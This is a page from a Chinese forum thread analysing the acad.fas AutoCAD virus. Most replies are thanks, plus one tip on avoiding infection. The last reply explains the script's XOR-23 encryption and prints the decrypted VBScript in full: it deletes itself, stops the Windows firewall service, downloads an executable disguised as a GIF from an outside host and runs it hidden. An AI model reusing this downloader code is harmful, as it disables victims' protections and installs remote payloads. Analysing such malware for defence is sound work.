头大无恼 发表于 2010-6-15 08:05:00

好贴

zxmmelly 发表于 2010-7-3 13:57:00

老猫的贴一定要回的

undead 发表于 2010-7-3 17:18:00

<p>多谢,学习了</p>
<p>&nbsp;</p>

edoumxx 发表于 2010-7-7 23:20:00

<p>这种病毒还会格盘?目前还没碰到</p>
<p>危害太大了,</p>
<p>下了学习一下,谢谢分享了</p>

842986480 发表于 2010-9-12 23:57:00

拜倒

461045462 发表于 2010-9-14 06:33:00

<p>这种病毒遇上很麻烦,上次遇上请人从windows和注册里面清除,才解决。</p>
<p>谢谢楼主的分享</p>

ldiamond 发表于 2010-10-11 15:10:00

下载看看,学习一下

pop159 发表于 2011-3-8 20:58:48

太强了!

zark 发表于 2011-3-30 14:14:11

不懂楼主有没有发现
假设一台未中CAD病毒的电脑,拷进1个文件夹后(包含病毒和DWG文件)
用两种方法打开,一种会中毒,一种不会。
1:会中毒
这种方法就是:::直接打开DWG
2:不会中毒
这种方法是先启动CAD,再打开病毒目录下的DWG。
所以,不懂你的图纸目录下有没有病毒,只要你养成习惯,先启动CAD,再打开图纸,都不会中毒

cabinsummer 发表于 2011-9-24 10:58:01

本帖最后由 cabinsummer 于 2011-9-24 11:02 编辑

其实这个脚本文件加密不是很复杂,就是每个字符与23异或做成加密On Error Resume Next
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile WScript.ScriptFullName, True
wscript.sleep 300000
createObject("wscript.shell").Run "cmd.exe /C net stop sharedaccess", 0, True
wscript.sleep 1200000
SavePth = LCase("c:\windows\web\logo.exe")
If objFSO.FileExists (SavePth) Then objFSO.DeleteFile (SavePth) End If
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.cadgs.com/z/logo.gif",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\windows\web\safemodelogo.gif",2
objFSO.MoveFile "c:\windows\web\safemodelogo.gif" , SavePth
If objFSO.GetFile (SavePth).size > 3000 Then CreateObject("Wscript.Shell").run SavePth, 0, true End If
If objFSO.FileExists (SavePth) Then objFSO.DeleteFile (SavePth) End If
页: 1 [2] 3 4
查看完整版本: [不死猫出品] acad.fas 病毒原理破解分析和病毒脚本源码